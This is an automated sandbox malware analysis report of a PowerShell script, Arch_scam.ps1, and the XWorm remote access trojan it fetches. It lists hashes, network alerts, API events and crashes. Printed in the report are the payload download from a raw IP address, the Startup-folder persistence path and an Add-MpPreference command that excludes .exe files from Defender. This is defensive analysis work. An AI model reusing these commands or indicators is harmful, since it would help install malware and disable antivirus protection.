Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 18, 2023, 7:44 a.m.	Sept. 18, 2023, 7:47 a.m.

Size	427.0B
Type	ASCII text, with CRLF line terminators
MD5	`671f5371312d91c2e723fe2035655aac`
SHA256	`f08bca5fa5192b6d3304b9322306c9018089697eeabbeb93614ba2a4156cc1dd`
CRC32	`167DD638`
ssdeep	`12:SVa3SuAHUVuAsQgns1eVM1t2U3RAFFYRnOHa:nCuAHUVuvQgsIVMMFFYRnQa`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Arch_scam.ps1
1492
- Archevod_XWorm.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe"
  2292

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
44.203.122.41	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49164 -> 44.203.122.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 44.203.122.41:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 44.203.122.41:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 44.203.122.41:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 18, 2023, 7:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 18, 2023, 7:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 18, 2023, 7:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 18, 2023, 7:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 18, 2023, 7:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 18, 2023, 7:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 18, 2023, 7:44 a.m.			0	0
IsDebuggerPresent Sept. 18, 2023, 7:44 a.m.			0	0
IsDebuggerPresent Sept. 18, 2023, 7:44 a.m.			0	0
IsDebuggerPresent Sept. 18, 2023, 7:44 a.m.			0	0

Command line console output was observed (16 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x00000023	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: nnot find the file specified. console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Arch_scam.ps1:1 char:14 console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: + start-process <<<< "c:\users\$env:username\Music/AnyDesk.exe" console_handle: 0x00000047	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x00000053	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: erationException console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: ommands.StartProcessCommand console_handle: 0x00000077	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000097	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x000000a3	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Arch_scam.ps1:3 char:17 console_handle: 0x000000bb	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: + Add-MpPreference <<<< -ExclusionExtension ".exe" console_handle: 0x000000c7	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x000000d3	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: mmandNotFoundException console_handle: 0x000000df	1	1
WriteConsoleW Sept. 18, 2023, 7:44 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000eb	1	1

Uses Windows APIs to generate a cryptographic key (14 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db5e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x009c3a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x009c3a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 18, 2023, 7:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x009c3a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

One or more processes crashed (28 events)

Time & API	Arguments	Status
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x198aa3 @ 0x318aa3 archevod_xworm+0x19656a @ 0x31656a archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748932 registers.edi: 4178160 registers.eax: 0 registers.ebp: 6748960 registers.edx: 0 registers.ebx: 2499697260 registers.esi: 1654784 registers.ecx: 35796920	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x198aa3 @ 0x318aa3 archevod_xworm+0x19656a @ 0x31656a archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748932 registers.edi: 6748932 registers.eax: 0 registers.ebp: 6748960 registers.edx: 2 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748968	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x198aa3 @ 0x318aa3 archevod_xworm+0x19656a @ 0x31656a archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748932 registers.edi: 6748932 registers.eax: 0 registers.ebp: 6748960 registers.edx: 2 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748968	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x198aa3 @ 0x318aa3 archevod_xworm+0x19656a @ 0x31656a archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748932 registers.edi: 6748932 registers.eax: 0 registers.ebp: 6748960 registers.edx: 2 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748968	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x198aa3 @ 0x318aa3 archevod_xworm+0x19656a @ 0x31656a archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748932 registers.edi: 6748932 registers.eax: 0 registers.ebp: 6748960 registers.edx: 0 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748968	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fb7d @ 0x30fb7d archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 2970096 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 4292427776 registers.esi: 1654784 registers.ecx: 1654784	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fb7d @ 0x30fb7d archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fb7d @ 0x30fb7d archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fb7d @ 0x30fb7d archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fb7d @ 0x30fb7d archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fb7d @ 0x30fb7d archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fe30 @ 0x30fe30 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 2970096 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 4292427776 registers.esi: 1654784 registers.ecx: 0	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fe30 @ 0x30fe30 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18fe60 @ 0x30fe60 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: cc 68 b8 d1 79 43 e9 9a d2 fe ff b0 d7 23 68 83 exception.symbol: archevod_xworm+0x19419b exception.instruction: int3 exception.module: Archevod_XWorm.exe exception.exception_code: 0x80000003 exception.offset: 1655195 exception.address: 0x31419b registers.esp: 6748860 registers.edi: 2968141 registers.eax: 2324 registers.ebp: 6748888 registers.edx: 6748896 registers.ebx: 4292427776 registers.esi: 1656391 registers.ecx: 0	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: exception.instruction_r: cc 68 2d e6 79 43 e9 d2 a6 fe ff 09 0f f8 80 ea exception.symbol: archevod_xworm+0x196d63 exception.instruction: int3 exception.module: Archevod_XWorm.exe exception.exception_code: 0x80000003 exception.offset: 1666403 exception.address: 0x316d63 registers.esp: 6748860 registers.edi: 2970096 registers.eax: 4 registers.ebp: 1111705675 registers.edx: 6748672 registers.ebx: 4292427776 registers.esi: 1654784 registers.ecx: 1246167040	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18ffc8 @ 0x30ffc8 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 2970096 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 4292427776 registers.esi: 1654784 registers.ecx: 6748888	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x18ffc8 @ 0x30ffc8 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x193083 @ 0x313083 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: ed 68 24 87 79 43 e9 14 9d ff ff d5 8c 72 5c 97 exception.symbol: archevod_xworm+0x187721 exception.instruction: in eax, dx exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000096 exception.offset: 1603361 exception.address: 0x307721 registers.esp: 6748848 registers.edi: 2970096 registers.eax: 1447909480 registers.ebp: 6748876 registers.edx: 22104 registers.ebx: 0 registers.esi: 2950532 registers.ecx: 10	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1930ab @ 0x3130ab archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 3f 68 65 cb 79 43 e9 79 e4 fe ff 38 59 5a c5 exception.symbol: archevod_xworm+0x192fbb exception.address: 0x312fbb exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 1650619 registers.esp: 6748848 registers.edi: 2970096 registers.eax: 1 registers.ebp: 6748876 registers.edx: 0 registers.ebx: 0 registers.esi: 2950532 registers.ecx: 0	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x19018a @ 0x31018a archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 2970096 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 4292427776 registers.esi: 1654784 registers.ecx: 0	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x19018a @ 0x31018a archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 2970096 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 4292427776 registers.esi: 1654784 registers.ecx: 1933	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf2d5 exception.instruction: div eax exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000094 exception.offset: 848597 exception.address: 0x24f2d5 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 0 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421483 registers.esi: 0 registers.ecx: 6748896	1
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x1902b1 @ 0x3102b1 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: archevod_xworm+0xcf300 exception.instruction: ud2 exception.module: Archevod_XWorm.exe exception.exception_code: 0xc000001d exception.offset: 848640 exception.address: 0x24f300 registers.esp: 6748860 registers.edi: 6748860 registers.eax: 0 registers.ebp: 6748888 registers.edx: 2 registers.ebx: 2421526 registers.esi: 0 registers.ecx: 6748896	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://44.203.122.41/Archevod_XWorm.exe

Performs some HTTP requests (1 event)

request

GET http://44.203.122.41/Archevod_XWorm.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 71 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06110000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06250000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06251000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06252000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
